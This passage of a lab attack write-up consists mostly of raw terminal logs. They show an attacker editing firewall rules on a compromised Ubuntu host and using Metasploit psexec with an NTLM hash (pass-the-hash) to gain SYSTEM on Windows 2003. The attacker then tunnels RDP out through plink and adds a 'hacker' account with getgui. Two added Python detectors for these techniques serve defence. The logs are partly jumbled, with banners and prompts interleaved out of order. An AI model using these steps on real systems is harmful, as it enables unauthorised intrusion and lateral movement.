LOG all -- anywhere anywhere LOG level warning prefix `INPUT-DROP'
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere multiport dports ftp,www,https
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT icmp -- anywhere anywhere
LOG all -- anywhere anywhere LOG level warning prefix `FORWARD-DROP'
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@ubuntu:~# iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
root@ubuntu:~# iptables -L
iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- 172.16.50.0/24 anywhere tcp dpt:ssh
LOG all -- anywhere anywhere LOG level warning prefix `INPUT-DROP'
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere multiport dports ftp,www,https
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT icmp -- anywhere anywhere
LOG all -- anywhere anywhere LOG level warning prefix `FORWARD-DROP'
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@ubuntu:~# exit
exit
logout
Using username "root".
c:\>exit
meterpreter >
On BT5:
root@bt:~# ssh root@172.16.49.100
The authenticity of host '172.16.49.100 (172.16.49.100)' can't be established.
RSA key fingerprint is fa:0a:b4:f9:48:a0:cf:99:1e:9e:a4:1b:56:5e:df:d2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.49.100' (RSA) to the list of known hosts.
root@172.16.49.100's password:
Linux ubuntu 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
Ubuntu 10.10
Welcome to Ubuntu!
* Documentation: https://help.ubuntu.com/
310 packages can be updated.
179 updates are security updates.
New release 'natty' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Dec 4 04:32:50 2011 from 172.16.50.40
root@ubuntu:~# whoami
root
root@ubuntu:~# exit
logout
Connection to 172.16.49.100 closed.
root@bt:~#
6- Attacker uses psexec for pass-the-hash and gets into Win2003; escalates privileges and enables the GUI
msf > search psexec
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution
exploit/windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > set RHOST 172.16.50.30
RHOST => 172.16.50.30
msf exploit(psexec) > set SMBUser
SMBUser =>
msf exploit(psexec) > unset SMBUser
Unsetting SMBUser...
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 5f9c8fca1932ced5aad3b435b51404ee:aeada5b26e6d1da1d7d96f38387b026c
SMBPass => 5f9c8fca1932ced5aad3b435b51404ee:aeada5b26e6d1da1d7d96f38387b026c
msf exploit(psexec) > set PAYLOAD
set PAYLOAD generic/custom
set PAYLOAD generic/debug_trap
set PAYLOAD generic/shell_bind_tcp
set PAYLOAD generic/shell_reverse_tcp
set PAYLOAD generic/tight_loop
set PAYLOAD windows/adduser
set PAYLOAD windows/dllinject/bind_ipv6_tcp
set PAYLOAD windows/dllinject/bind_nonx_tcp
set PAYLOAD windows/dllinject/bind_tcp
set PAYLOAD windows/dllinject/reverse_http
set PAYLOAD windows/dllinject/reverse_ipv6_tcp
set PAYLOAD windows/dllinject/reverse_nonx_tcp
set PAYLOAD windows/dllinject/reverse_ord_tcp
set PAYLOAD windows/dllinject/reverse_tcp
set PAYLOAD windows/dllinject/reverse_tcp_allports
set PAYLOAD windows/dllinject/reverse_tcp_dns
set PAYLOAD windows/download_exec
set PAYLOAD windows/exec
set PAYLOAD windows/loadlibrary
set PAYLOAD windows/messagebox
set PAYLOAD windows/meterpreter/bind_ipv6_tcp
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set PAYLOAD windows/meterpreter/bind_tcp
set PAYLOAD windows/meterpreter/reverse_http
set PAYLOAD windows/meterpreter/reverse_https
--More--
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.50.30 yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 5f9c8fca1932ced5aad3b435b51404ee:aeada5b26e6d1da1d7d96f38387b026c no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 172.16.50.30 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating to 172.16.50.30:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \hunhdDhl.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.50.30[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.50.30[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (IcHuCEpc - "MrNsyYyumMmdqLiH")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hunhdDhl.exe...
[*] Sending stage (752128 bytes)
[*] Meterpreter session 3 opened (172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444) at 2011-12-04 10:43:35 -0200
meterpreter > background
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > shell
Process 3244 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.50.30
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.50.1
C:\WINDOWS\system32>exit
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
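Added example for the Windows 2003 side of step 6 (not part of the original script). The psexec run above leaves a recognisable trail on the target: a network logon as Administrator from the pivot host, a service created with a random name whose binary was just written into the ADMIN$ share (the system root), the service started, and both removed seconds later. The detector below correlates those events: a service installation preceded within a short window by a network logon from a remote address, where the binary lives directly in the system root or the service disappears again within the window. The event records are constructed in a simplified form; on a real host they come from the Security log (event 540 on Windows 2003, 4624 on later versions, logon type 3) and the System log (event 7045, service installed). The service and binary names are the ones the module printed in the transcript, and the 60-second window is an assumption.

```python
from datetime import datetime, timedelta

# Constructed event records (not from the page), modelled on what the demo's
# psexec run would leave on host CASA, plus two benign records: an interactive
# admin installing a normal service hours earlier, and a plain file-share logon.
SAMPLE_EVENTS = [
    {"ts": "2011-12-04T08:00:00", "host": "CASA", "kind": "logon", "logon_type": 2,
     "user": "Administrator", "src_ip": "-"},
    {"ts": "2011-12-04T08:05:12", "host": "CASA", "kind": "service_installed",
     "service": "BackupAgent", "image": "C:\\Program Files\\Acme\\agent.exe"},
    {"ts": "2011-12-04T10:20:00", "host": "CASA", "kind": "logon", "logon_type": 3,
     "user": "cassio", "src_ip": "172.16.50.40"},
    {"ts": "2011-12-04T10:43:30", "host": "CASA", "kind": "logon", "logon_type": 3,
     "user": "Administrator", "src_ip": "172.16.50.40"},
    {"ts": "2011-12-04T10:43:33", "host": "CASA", "kind": "service_installed",
     "service": "IcHuCEpc", "image": "%SystemRoot%\\hunhdDhl.exe"},
    {"ts": "2011-12-04T10:43:35", "host": "CASA", "kind": "service_removed",
     "service": "IcHuCEpc"},
]

WINDOW = timedelta(seconds=60)   # assumed correlation window


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def in_system_root(image):
    """True when the service binary sits directly in the Windows root, which is
    what writing into the ADMIN$ share produces (normal services live deeper)."""
    head, _, tail = image.replace("/", "\\").rpartition("\\")
    return head.lower() in ("%systemroot%", "c:\\windows") and tail.lower().endswith(".exe")


def detect_remote_service_exec(events, window=WINDOW):
    """Alert on service installs that follow a remote network logon on the same
    host within `window` and show at least one psexec-style trait."""
    evs = sorted(events, key=lambda e: parse_ts(e["ts"]))
    alerts = []
    for e in evs:
        if e["kind"] != "service_installed":
            continue
        t = parse_ts(e["ts"])
        logons = [l for l in evs
                  if l["kind"] == "logon" and l["host"] == e["host"]
                  and l.get("logon_type") == 3
                  and l.get("src_ip") not in (None, "", "-")
                  and timedelta(0) <= t - parse_ts(l["ts"]) <= window]
        if not logons:
            continue
        removed = any(r["kind"] == "service_removed" and r["host"] == e["host"]
                      and r.get("service") == e["service"]
                      and timedelta(0) <= parse_ts(r["ts"]) - t <= window
                      for r in evs)
        reasons = []
        if in_system_root(e["image"]):
            reasons.append("binary-in-system-root")
        if removed:
            reasons.append("removed-within-window")
        if reasons:
            last = logons[-1]            # the most recent qualifying logon
            alerts.append({"host": e["host"], "service": e["service"], "image": e["image"],
                           "user": last["user"], "src_ip": last["src_ip"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_remote_service_exec(SAMPLE_EVENTS):
        print(f"{a['host']}: service {a['service']} ({a['image']}) installed after "
              f"network logon by {a['user']} from {a['src_ip']}: {', '.join(a['reasons'])}")
```

The same correlation works with NTLM logons that carry an NT hash rather than a password, which is the point for pass-the-hash: the target never sees the difference, so detection has to key on the logon-plus-service pattern rather than on the credential itself.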
7- Bonus: remote access to the two machines using mstsc, tunnelled over SSH on port 80
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1984 created.
Channel 25 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\>plink.exe -l root -pw cabeca1 -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
plink.exe -l root -pw cabeca1 -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
FATAL ERROR: Network error: Connection timed out
c:\>plink.exe -l root -pw cabeca1 -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200^[[D^[
plink.exe -l
PuTTY Link: command-line connection utility
Release 0.53b
Usage: plink [options] [user@]host [command]
("host" can also be a PuTTY saved session name)
Options:
-v show verbose messages
-load sessname Load settings from saved session
-ssh -telnet -rlogin -raw
force use of a particular protocol (default SSH)
-P port connect to specified port
-l user connect with specified username
-m file read remote command(s) from file
-batch disable all interactive prompts
The following options only apply to SSH connections:
-pw passw login with specified password
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Thu Dec 1 15:42:31 2011
root@bt:~#
meterpreter > shell
Process 1984 created.
Channel 25 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\>plink.exe -l root -pw password -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
plink.exe -l root -pw password -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
FATAL ERROR: Network error: Connection timed out
c:\>plink.exe -l root -pw password -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
plink.exe -l
PuTTY Link: command-line connection utility
Release 0.53b
Usage: plink [options] [user@]host [command]
("host" can also be a PuTTY saved session name)
Options:
-v show verbose messages
-load sessname Load settings from saved session
-ssh -telnet -rlogin -raw
force use of a particular protocol (default SSH)
-P port connect to specified port
-l user connect with specified username
-m file read remote command(s) from file
-batch disable all interactive prompts
The following options only apply to SSH connections:
-pw passw login with specified password
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Sun Dec 4 10:57:31 2011 from 172.16.50.40
root@bt:~# exit
exit
logout
Using username "root".
c:\>exit
meterpreter > background
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > run
Display all 169 possibilities? (y or n)
meterpreter > run get
run get_application_list run get_pidgin_creds run gettelnet
run get_env run get_valid_community run getvncpw
run get_filezilla_creds run getcountermeasure
run get_local_subnets run getgui
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
-u <opt> The Username of the user to add.
meterpreter > run getgui -u hacker -p hacker
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Sun Dec 4 11:01:26 2011 from 172.16.50.40
root@bt:~# exit
exit
logout
Using username "root".
c:\>exit
meterpreter > background
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > run get
run get_application_list run get_pidgin_creds run gettelnet
run get_env run get_valid_community run getvncpw
run get_filezilla_creds run getcountermeasure
run get_local_subnets run getgui
meterpreter > run get
run get_application_list run get_pidgin_creds run gettelnet
run get_env run get_valid_community run getvncpw
run get_filezilla_creds run getcountermeasure
run get_local_subnets run getgui
meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Sun Dec 4 11:04:12 2011 from 172.16.50.40
root@bt:~# exit
exit
logout
Using username "root".
c:\>
on BT5
root@bt:~# rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16
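From the defender's side, the step above leaves a clear trace on the compromised client: a process creation for an SSH client (plink.exe) whose command line carries -R (a reverse forward that exposes the local RDP port to an outside host), a destination port that is not 22 (here 21, the port the firewall let through), and a clear-text -pw password. The following scanner is an added example and is not code from the original post or the seminar; it runs over a constructed "host|user|command line" record format (as exported from Sysmon Event ID 1 or an EDR) and flags those patterns. It accepts both -p and -P as the port flag because the log uses -p with plink even though plink documents -P.

```python
"""Flag reverse SSH tunnels in process-creation records (added example).

Record format (constructed for this example): "host|user|command line".
"""
import os
import re
from collections import defaultdict

# SSH clients that accept -R (remote/reverse port forwarding).
SSH_CLIENTS = {"ssh", "ssh.exe", "plink", "plink.exe"}

# Local services an attacker typically exposes through a reverse tunnel.
SENSITIVE_PORTS = {22: "ssh", 445: "smb", 3389: "rdp", 5900: "vnc", 5985: "winrm"}

# -R argument: [bind_addr:]port:host:hostport (OpenSSH and plink syntax).
REVERSE_SPEC = re.compile(
    r"^(?:(?P<bind>[^:]*):)?(?P<port>\d+):(?P<host>[^:]+):(?P<hostport>\d+)$"
)

# Constructed sample records. The first one mirrors the plink invocation seen
# in the seminar log, with a placeholder password instead of the real one.
SAMPLE_EVENTS = [
    "CLIENT125|CLIENT125\\Administrator|plink.exe -l root -pw s3cret -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200",
    "CASA|NT AUTHORITY\\SYSTEM|C:\\WINDOWS\\system32\\ipconfig.exe",
    "DEV01|corp\\alice|ssh -p 22 -L 8080:intranet:80 jump.corp.example",
    "DEV02|corp\\bob|ssh.exe -R 2222:localhost:22 user@203.0.113.5",
    "CASA|NT AUTHORITY\\SYSTEM|cmd.exe /c whoami",
]


def analyze_command_line(cmdline):
    """Return a list of (rule, detail) findings for one process command line."""
    argv = cmdline.split()
    if not argv:
        return []
    # Normalise Windows paths so basename() works on "C:\dir\plink.exe" too.
    image = os.path.basename(argv[0].replace("\\", "/")).lower()
    if image not in SSH_CLIENTS:
        return []

    findings = []
    is_plink = image.startswith("plink")
    for i, arg in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        if arg == "-R" and nxt:
            m = REVERSE_SPEC.match(nxt)
            if m:
                hostport = int(m.group("hostport"))
                svc = SENSITIVE_PORTS.get(hostport, "port %d" % hostport)
                findings.append(("reverse_tunnel",
                                 "exposes local %s (%s:%d) on remote port %s"
                                 % (svc, m.group("host"), hostport, m.group("port"))))
            else:
                findings.append(("reverse_tunnel", "unparsed -R spec %r" % nxt))
        elif arg in ("-p", "-P") and nxt and nxt.isdigit() and int(nxt) != 22:
            # SSH to a port normally used by another service (e.g. 21 or 80)
            # is how the tunnel slips through a port-based firewall policy.
            findings.append(("nonstandard_ssh_port", "SSH to port %s" % nxt))
        elif arg == "-pw" and is_plink and nxt:
            findings.append(("cleartext_password", "plink -pw password on command line"))
    return findings


def scan_events(records):
    """Group findings by host; returns {host: [(rule, detail, user), ...]}.

    Hosts without findings are omitted.
    """
    hits = defaultdict(list)
    for rec in records:
        host, user, cmdline = rec.split("|", 2)
        for rule, detail in analyze_command_line(cmdline):
            hits[host].append((rule, detail, user))
    return dict(hits)


if __name__ == "__main__":
    for host, items in scan_events(SAMPLE_EVENTS).items():
        for rule, detail, user in items:
            print("%s %s %s: %s" % (host, user, rule, detail))
```

The reverse-tunnel rule alone is enough to catch the RDP exposure in the log; the port and password rules are there so a local -L forward to a legitimate jump host on port 22 does not fire while a plink -pw ... -p 21 invocation lights up on three counts.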